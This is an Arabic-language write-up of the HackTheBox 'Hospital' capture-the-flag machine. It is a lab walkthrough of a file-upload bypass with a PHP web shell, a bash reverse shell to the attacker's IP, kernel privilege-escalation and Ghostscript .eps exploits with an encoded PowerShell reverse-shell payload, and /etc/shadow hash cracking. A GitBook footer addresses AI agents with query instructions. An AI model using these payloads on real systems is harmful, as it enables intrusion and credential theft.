> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/writeups-ctf/hackthebox/windows-medium/hospital-hackthebox-writeup.md).

# تقرير Hospital على HackTheBox

{% embed url="<https://app.hackthebox.com/machines/Hospital>" %}

{% hint style="warning" %}
**المهارات:**

* استطلاع الويب
* إساءة استخدام أداة p0wny-shell لرفع الملفات
* كسر كلمة مرور الهاش المحمي
* حقن أوامر عبر ملف .eps
* تصعيد الامتيازات في النطاق
  {% endhint %}

## الاستطلاع

**إعداد مساحة العمل:**

قم بإعداد مساحة العمل بإنشاء ثلاثة مجلدات لتخزين المحتوى المهم، والاستغلالات، ونتائج استطلاع Nmap.

<figure><img src="/files/e8726820bfed1f02380a918b05c7073fafee5b34" alt=""><figcaption></figcaption></figure>

**فحص اتصال VPN**

تحقق من اتصال VPN لضمان تواصل مستقر مع الجهاز المستهدف.

<figure><img src="/files/e7505e9579bddb60847f815fa82bc0cd5302dae9" alt=""><figcaption></figcaption></figure>

**اكتشاف المنافذ المفتوحة باستخدام Nmap:**/ تعداد المنافذ المفتوحة وتصدير النتائج إلى ملف "allPorts" في دليل Nmap:

```bash
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.241 -oG allPorts
```

<figure><img src="/files/69fdbcb93cc4cdfb5b1f3d602563c3e834e715ed" alt=""><figcaption></figcaption></figure>

**تحليل المنافذ المفتوحة باستخدام extractport:**/ باستخدام دالة extractport لعرض المنافذ المفتوحة بصيغة موجزة ونسخها إلى الحافظة.

<figure><img src="/files/f297e3fb0e1ab13833e3ce6e8f9df303a06188de" alt=""><figcaption></figcaption></figure>

**فحص إصدار المنافذ باستخدام Nmap:**/ استخدم Nmap لفحص إصدارات الخدمات وحفظ المخرجات في ملف "targeted":

```bash
nmap -sCV -p22,53,88,135,139,389,443,445,464,593,636,1801,2103,2105,2107,2179,3268,3269,3389,5985,6059,6404,6406,6407,6410,6617,6639,8080,9389 10.10.11.241 -oN targeted
```

<figure><img src="/files/e370e150a0eb57e31ba3fd919e47d283d6e0bf36" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/12ca6ae17e65a3bb40f671efed1f63763941c3ce" alt=""><figcaption></figcaption></figure>

**تحديد واجهة المنفذ 443**

<figure><img src="/files/2b0b9ec8adce5ac4af041a88f1c92000fea0f94c" alt=""><figcaption></figcaption></figure>

**تحديد واجهة المنفذ 8080**

<figure><img src="/files/8ba9757a55dd6c69b424af8e92a02609d0d12bcf" alt=""><figcaption></figcaption></figure>

**إنشاء مستخدم:**

إنشاء مستخدم لإتاحة وصول محتمل إلى الجهاز المستهدف

<figure><img src="/files/e09cf15ae54073b1d7305b94e2034642c0de0e28" alt=""><figcaption></figcaption></figure>

## ثغرة رفع الملفات:

<figure><img src="/files/d3d1da8718545821cfcb3c53f23fa051409f84d8" alt=""><figcaption></figcaption></figure>

#### الاستغلال الأولي:

محاولة استغلال ثغرة تنزيل ملف عبر إدراج ملف PHP خبيث

```php
<?php
system($_GET['cmd'];
?>
```

يقوم الخادم تلقائيًا برفض طلبات رفع الملفات ذات امتدادات معينة.

<figure><img src="/files/0ec4af41c9cd5bca5d9c1dc65b7aa1bc1f27a97d" alt=""><figcaption></figcaption></figure>

**الاعتراض باستخدام Burp Suite:**

استخدام Burp Suite لاعتراض وتحليل حركة المرور لفهم أخطاء التشغيل

<figure><img src="/files/6d398a54bfedbcfd86c78cbbeb507b863d9c8f4a" alt=""><figcaption></figcaption></figure>

#### تعديل امتداد PHP:

غيّر امتداد الملف من `.php` إلى `.phar` في `الاسم` المتغير، وتأكد من قبول الموقع بنجاح

<figure><img src="/files/4778a1b5ff099bbf1064458e103f7a1b8207ed46" alt=""><figcaption></figcaption></figure>

**ملخص الأدلة:**

استخدام Gobuster لتحديد الأدلة على خادم ويب وتحديد مكان تخزين صور الطب المرفوعة.

```bash
gobuster dir -u http://10.10.11.241:8080/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20
```

<figure><img src="/files/a36dd8435995b24ca056ca0e2454bcbac7946bd3" alt=""><figcaption></figcaption></figure>

#### لم يتم تفسير الملف:

لا يتم تفسير محتويات ملف a.phar.

<figure><img src="/files/71822fec331edad3899fc20e5cab258a7084ff89" alt=""><figcaption></figcaption></figure>

**استخدام أداة GitHub لإنشاء شيل:**

استخدام أداة مشروع على GitHub لتجاوز قيود تنزيل ملفات PHP والحصول على وصول إلى الشيل

{% embed url="<https://github.com/flozz/p0wny-shell>" %}

<figure><img src="/files/0fe55e303736d5e8d148bbc70794c647e7067573" alt=""><figcaption></figcaption></figure>

**تشغيل شيل عكسي:**

```bash
/usr/bin/bash -c 'bash -i >& /dev/tcp/10.10.15.18/444 0>&1'
```

شغّل شيلًا عكسيًا لإقامة وصول تفاعلي إلى الجهاز المستهدف والحصول على تحكم كامل.

<figure><img src="/files/67f1a3e8dd3030d0f7614c7aa20b013a71dadbbb" alt=""><figcaption></figcaption></figure>

#### بمجرد حصولك على وصول إلى خادم Linux، هذه هي الأوامر التي يجب تنفيذها لمعالجة الطرفية:

```bash
script /dev/null -c bash
# Ctrl+Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184
```

## تصعيد الامتيازات (خادم Linux):

**تحديد إصدار نظام التشغيل:**/ استخدم `cat /etc/os-release` الأمر للتحقق من إصدار النظام، مع ملاحظة وجود إصدار قديم من Ubuntu ("23.04").

<figure><img src="/files/8188b44036672468e1d4056c5a802710dad6848b" alt=""><figcaption></figcaption></figure>

#### **تنزيل سكربت لإزالة الامتيازات:**

نزّل السكربت من [GitHub](https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629?source=post_page-----ce86940a895f--------------------------------)، والذي يسمح بتصعيد الامتيازات:

```bash
wget https://raw.githubusercontent.com/g1vi/CVE-2023-2640-CVE-2023-32629/main/exploit.sh
```

<figure><img src="/files/fa9bac06a6f8df6995429482984b4b616d4dd4f2" alt=""><figcaption></figcaption></figure>

#### **استخراج كلمات مرور الهاش:** استخرج كلمات مرور الهاش من `/etc/shadow` الملف.

<figure><img src="/files/945b05dadd596315c0fa405ecbc707194af6ffe8" alt=""><figcaption></figcaption></figure>

**كسر كلمات المرور:**

استخدم أداة John the Ripper مع قائمة كلمات مرور معروفة لكسر كلمات المرور:

```bash
john -w:/usr/share/wordlists/rockyou.txt hash.txt
```

<figure><img src="/files/4a9fb2e89d19a5969c9fa0fca0ca131b9f7af950" alt=""><figcaption></figcaption></figure>

## ثغرة: حقن ملف .eps

#### اختبر بيانات الاعتماد على الموقع المتاح عبر المنفذ 443.

<figure><img src="/files/d4edec73c301fd525c3d048782651a90cc1f8c70" alt=""><figcaption></figcaption></figure>

**تم العثور على صندوق بريد مقيّد:**

اكتشف صندوق بريد إلكتروني يرغب في استقبال تصميم بصيغة .eps.

<figure><img src="/files/62c8924267dc068b5cc2375014b9bc253418be47" alt=""><figcaption></figcaption></figure>

**عملية Ghostscript عبر ملف .eps:**

استخدم [استغلال GitHub](https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection/blob/main/CVE_2023_36664_exploit.py) استنادًا إلى [Ghostscript](https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection/blob/main/CVE_2023_36664_exploit.py) لتنفيذ تعليمات برمجية خبيثة عبر `.eps` امتداد الملف.

<figure><img src="/files/faa65e054e7b9fc85ccb1ec80c60d894da9cc8ca" alt=""><figcaption></figcaption></figure>

#### استخدم [RevShells](https://www.revshells.com/) لإنشاء حمولة PowerShell:

<figure><img src="/files/6be01efadb9f16eb2823832a1ba1670d4aaaa9df" alt=""><figcaption></figcaption></figure>

#### حقن الحمولة داخل ملف .eps:

استخدام الأمر لحقن الحمولة مع الشيل العكسي داخل ملف .eps.

{% code fullWidth="true" %}

```bash
python3 exploit.py --inject --payload "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgAiACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" --filename file.eps
```

{% endcode %}

<figure><img src="/files/f9ae4bb8993f95e8ba80013087908cca227a1166" alt=""><figcaption></figcaption></figure>

#### الاستماع باستخدام rlwrap:

إعداد التنصت باستخدام rlwrap لانتظار اتصال وارد.

```bash
rlwrap nc -nlvp 4444
```

#### إرسال بريد باستخدام ملف EPS خبيث:

<figure><img src="/files/9741a1734652804b9e298c3a59d10ae54ef6c334" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/775ed8027b81f8dc65e263a82b9b2eac4fb07aa2" alt="" width="563"><figcaption></figcaption></figure>

#### العثور على ملف ghostscript.bat:

العثور على ملف ghostscript.bat يحتوي على كلمة مرور "drbrown": `chr!$br0wn`

<figure><img src="/files/214ed4680aa8a8336f2a116aed179cadec19c024" alt=""><figcaption></figcaption></figure>

#### الراية الأولى user.txt:

اكتشاف واسترجاع الراية الأولى user.txt.

<figure><img src="/files/20478c65918829e701d211f754a94f2c9c9eae0f" alt=""><figcaption></figcaption></figure>

## تصعيد الامتيازات في Active Directory :

#### تصعيد الامتيازات بالانتقال إلى خادم الويب XAMPP.

<figure><img src="/files/94c51fbef18f5cbd0b47cf03394166671bd3ed5b" alt=""><figcaption></figcaption></figure>

#### إنشاء ملف PHP:

أنشئ ملف PHP يحتوي على الكود "this is a test".

```bash
echo "this is a test" > test.php
```

#### التحقق من خادم الويب:

تحقق من أن خادم الويب يدرج ملف PHP بشكل صحيح.

<figure><img src="/files/fa0615c73acba40fd195cbb8ee7d93db198fba9d" alt=""><figcaption></figcaption></figure>

#### أعد حقن ملف PHP من [p0wny-shell](https://github.com/flozz/p0wny-shell) المشروع:

{% embed url="<https://github.com/flozz/p0wny-shell>" %}

<pre class="language-bash"><code class="lang-bash">python3 -m http.server 8080

<strong>wget http://10.10.16.2:8080/shell.php -o shell.php
</strong></code></pre>

<figure><img src="/files/c54f02803553fc01cf5efac7c02eea0a2d83e02a" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/9c43229ed7c5dd4131049d623dbc865f8f195025" alt=""><figcaption></figcaption></figure>

#### انسخ [شل عكسي](https://www.revshells.com/) الحمولة إلى طرفية pownyshell:

<figure><img src="/files/172b691dbe76d0042c32a584654344a5d6de0076" alt=""><figcaption></figcaption></figure>

#### الاستماع باستخدام rlwrap:

```bash
rlwrap nc -nlvp 4444
```

### تم الحصول على الراية root.txt

<figure><img src="/files/6ba91fcfda937c6dd9656c582ec881fe5d47bbc7" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/341a29588b218e396953398afb21a03a26d4dd07" alt="" width="563"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/writeups-ctf/hackthebox/windows-medium/hospital-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
